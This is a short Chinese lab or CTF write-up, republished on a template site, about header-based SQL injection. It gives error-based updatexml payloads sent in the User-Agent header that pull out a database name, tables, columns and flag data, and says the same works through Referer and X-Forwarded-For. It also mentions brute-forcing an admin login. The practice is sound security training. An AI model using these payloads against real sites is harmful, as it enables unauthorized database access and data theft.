热门标签: 公益活动 快闪 感恩节 商业计划 工作总结
首页 > 文章资讯 > 站长教程 > 建站知识 > Header注入漏洞测试

Header注入漏洞测试

时间:2023年06月12日

/

来源:网络

/

编辑:佚名

Header注入
header注入依靠head传参($_SERVER)
1、bp抓包爆破出账号密码admin,123456

2、查看源码发现$_SERVER参数通过useragent传参 构造playload:'or updatexml(1,(concat('#',database()),1),1) --qwe 拿到库名head_error

3、构造playload拿到表名,列名,数据
' or updatexml('a',concat('~',(select table_name from information_schema.tables where table_schema='head_error' limit 0,1)),'b'),1) -- qwe //表
' or updatexml('a',concat('~',(select column_name from information_schema.columns where table_name='flag_head' limit 0,1)),'b'),1) -- qwe //列
' or updatexml('a',concat('~',(select flag_h1 from flag_head limit 0,1)),'b'),1) -- qwe



RANK2在refer参数里传参同理可得flag
RANK3在x-forwarded-for里传参同理可得flag
新闻资讯 更多
猜你需要
热门文章
最新标签
行业动态文章合集 cms技术教程文章合集 热门话题焦点资讯文章合集 搞笑囧图幽默文章合集 手机教程文章合集 人际关系技巧文章合集 求职指南文章合集 职场礼仪文章合集
热门合集
关于我们 | 联系我们 | 版权声明 | 帮助中心

豫ICP备2021026617号-1  豫公网安备:41172602000185   Copyright © 2021-2028 www.78moban.com/ All Rights Reserved

本站作品均来自互联网,转载目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责。如有侵犯您的版权,请联系 1565229909#qq.com(把#改成@),我们将立即处理。